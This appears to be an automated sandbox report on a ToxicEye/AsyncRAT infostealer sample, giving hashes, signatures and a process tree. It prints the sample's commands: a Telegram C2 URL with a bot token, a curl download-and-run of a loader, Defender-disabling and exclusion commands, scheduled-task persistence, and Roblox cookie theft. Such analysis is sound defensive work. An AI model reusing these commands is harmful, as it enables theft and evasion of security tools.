Analysis

  • max time kernel
    9s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-01-2024 01:02

General

  • Target

    52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe

  • Size

    14.6MB

  • MD5

    cef5534159555f0df0b6e85715c19208

  • SHA1

    b1d4a0ccf69b20ba3114696e6d7c126089080325

  • SHA256

    52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6

  • SHA512

    2c3e75871fd59db084747c078fa92050cb5ee3a47a307730f57cada79ae5ba00e037ffe8508e834eb4630d8f8cf1e8b5d50b88ae7027f66f55033ac92a511460

  • SSDEEP

    393216:+SL+9qz88Ck+7q3p91JmBqfKV6egI7w13CT6Ztw6:+++9q4G331UofXeRw13CT6

Malware Config

Extracted

Family

toxiceye

C2

https://api.telegram.org/bot6782288559:AAGGaNp1iJda_iae5clmNAjmS8bZxRP8kMY/sendMessage?chat_id=6117387875

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • ToxicEye

    ToxicEye is a trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 32 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe
    "C:\Users\Admin\AppData\Local\Temp\52cae576b71c872d793937b5437db6c2a15324342d7d9c4101cd516dd4944cc6.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:704
    • C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE
      "C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4032
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4A96.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4A96.tmp.bat
        3⤵
          PID:1508
      • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
        "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3536
        • C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
          "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE""
            4⤵
              PID:1184
              • C:\Windows\system32\PING.EXE
                ping localhost -n 3
                5⤵
                • Runs ping.exe
                PID:748
        • C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE
          "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE"
          2⤵
          • Executes dropped EXE
          PID:2760
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5 | find /i /v "md5" | find /i /v "certutil"
            3⤵
              PID:5656
              • C:\Windows\system32\find.exe
                find /i /v "certutil"
                4⤵
                  PID:5456
                • C:\Windows\system32\find.exe
                  find /i /v "md5"
                  4⤵
                    PID:5368
                  • C:\Windows\system32\certutil.exe
                    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5
                    4⤵
                      PID:5488
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1196977210687488151/1197232221279485992/loader.exe -o NewVersion.exe --silent
                    3⤵
                      PID:6060
                      • C:\Windows\system32\curl.exe
                        curl https://cdn.discordapp.com/attachments/1196977210687488151/1197232221279485992/loader.exe -o NewVersion.exe --silent
                        4⤵
                          PID:4952
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c NewVersion.exe
                        3⤵
                          PID:5244
                          • C:\Users\Admin\AppData\Local\Temp\NewVersion.exe
                            NewVersion.exe
                            4⤵
                              PID:3212
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\NewVersion.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                5⤵
                                  PID:5128
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c >nul Powershell -C Add-Mppreference -ExclusionPath '%TEMP%', 'C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe'
                                  5⤵
                                    PID:5672
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Powershell -C Add-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp', 'C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe'
                                      6⤵
                                        PID:5376
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c >nul Powershell -C Add-Mppreference -ExclusionProcess '1319773207-1155979729-59570605-1200615738.exe'
                                      5⤵
                                        PID:4068
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell -C Add-Mppreference -ExclusionProcess '1319773207-1155979729-59570605-1200615738.exe'
                                          6⤵
                                            PID:5212
                                        • C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe"
                                          5⤵
                                            PID:1960
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Powershell -C Add-Mppreference -ExclusionPath '%TEMP%', 'C:\Windows\z$-dskchk.exe'
                                              6⤵
                                                PID:4988
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Powershell -C Add-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp', 'C:\Windows\z$-dskchk.exe'
                                                  7⤵
                                                    PID:4020
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Powershell -C Add-Mppreference -ExclusionProcess 'z$-dskchk'
                                                  6⤵
                                                    PID:5556
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Powershell -C Add-Mppreference -ExclusionProcess 'z$-dskchk'
                                                      7⤵
                                                        PID:4512
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Powershell -C Add-Mppreference -ExclusionPath '%TEMP%', 'C:\Windows\z$-rk0.exe'
                                                      6⤵
                                                        PID:5508
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Powershell -C Add-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp', 'C:\Windows\z$-rk0.exe'
                                                          7⤵
                                                            PID:3764
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Powershell -C Add-Mppreference -ExclusionProcess 'z$-rk0.exe'
                                                          6⤵
                                                            PID:5176
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Powershell -C Add-Mppreference -ExclusionProcess 'z$-rk0.exe'
                                                              7⤵
                                                                PID:4732
                                                            • C:\Windows\z$-dskchk.exe
                                                              "C:\Windows\z$-dskchk.exe"
                                                              6⤵
                                                                PID:3736
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Powershell -C Add-Mppreference -ExclusionPath '%TEMP%', 'C:\Windows\z$-dskchk.exe'
                                                                  7⤵
                                                                    PID:4352
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Powershell -C Add-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp', 'C:\Windows\z$-dskchk.exe'
                                                                      8⤵
                                                                        PID:5184
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe"
                                                                    6⤵
                                                                      PID:432
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                        7⤵
                                                                        • Runs ping.exe
                                                                        PID:3836
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c >nul Powershell -C Remove-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe'
                                                                    5⤵
                                                                      PID:1100
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Powershell -C Remove-Mppreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1319773207-1155979729-59570605-1200615738.exe'
                                                                        6⤵
                                                                          PID:1188
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c >nul Powershell -C Remove-Mppreference -ExclusionProcess '1319773207-1155979729-59570605-1200615738.exe'
                                                                        5⤵
                                                                          PID:5440
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Powershell -C Remove-Mppreference -ExclusionProcess '1319773207-1155979729-59570605-1200615738.exe'
                                                                            6⤵
                                                                              PID:4068
                                                                    • C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE
                                                                      "C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE"
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4084
                                                                  • C:\Windows\system32\OpenWith.exe
                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                    1⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:3980
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE""
                                                                    1⤵
                                                                      PID:4076
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                      1⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1360
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                        2⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:812
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE'"
                                                                      1⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4208
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE'
                                                                        2⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1828
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                      1⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2044
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                        2⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3516
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                      1⤵
                                                                        PID:432
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                          2⤵
                                                                            PID:916
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FO LIST
                                                                          1⤵
                                                                          • Enumerates processes with tasklist
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4768
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
                                                                          1⤵
                                                                            PID:5180
                                                                          • C:\Windows\system32\tasklist.exe
                                                                            Tasklist /fi "PID eq 4688"
                                                                            1⤵
                                                                            • Enumerates processes with tasklist
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5364
                                                                          • C:\Windows\system32\find.exe
                                                                            find ":"
                                                                            1⤵
                                                                              PID:5464
                                                                            • C:\Windows\system32\tree.com
                                                                              tree /A /F
                                                                              1⤵
                                                                                PID:5616
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe"
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5608
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                1⤵
                                                                                  PID:5748
                                                                                  • C:\Windows\system32\tree.com
                                                                                    tree /A /F
                                                                                    2⤵
                                                                                      PID:5852
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                    1⤵
                                                                                      PID:5868
                                                                                      • C:\Windows\system32\tree.com
                                                                                        tree /A /F
                                                                                        2⤵
                                                                                          PID:5956
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                        1⤵
                                                                                          PID:5988
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            2⤵
                                                                                              PID:6060
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            1⤵
                                                                                              PID:6136
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                              1⤵
                                                                                                PID:6084
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                1⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4076
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
                                                                                                  2⤵
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:2644
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                1⤵
                                                                                                  PID:5312
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                    2⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4968
                                                                                                • C:\Users\SubZ\PERMENANTSPOOFER.exe
                                                                                                  "PERMENANTSPOOFER.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2392
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
                                                                                                    2⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:5980
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5332
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                  1⤵
                                                                                                    PID:5724
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5360.tmp" "c:\Users\Admin\AppData\Local\Temp\3lm1d11b\CSC1105E8604D4B478982B565FB636B6650.TMP"
                                                                                                    1⤵
                                                                                                      PID:3792
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      Timeout /T 1 /Nobreak
                                                                                                      1⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:6052
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3lm1d11b\3lm1d11b.cmdline"
                                                                                                      1⤵
                                                                                                        PID:5980
                                                                                                      • C:\Windows\system32\getmac.exe
                                                                                                        getmac
                                                                                                        1⤵
                                                                                                          PID:6096
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe a -r -hp"gg" "C:\Users\Admin\AppData\Local\Temp\kL42X.zip" *
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5984
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe a -r -hp"gg" "C:\Users\Admin\AppData\Local\Temp\kL42X.zip" *"
                                                                                                          1⤵
                                                                                                            PID:1176
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                            1⤵
                                                                                                              PID:6040
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              1⤵
                                                                                                                PID:5220
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                1⤵
                                                                                                                  PID:5520
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic os get Caption
                                                                                                                    2⤵
                                                                                                                      PID:4556
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic computersystem get totalphysicalmemory
                                                                                                                    1⤵
                                                                                                                      PID:5176
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic csproduct get uuid
                                                                                                                      1⤵
                                                                                                                        PID:216
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:432
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
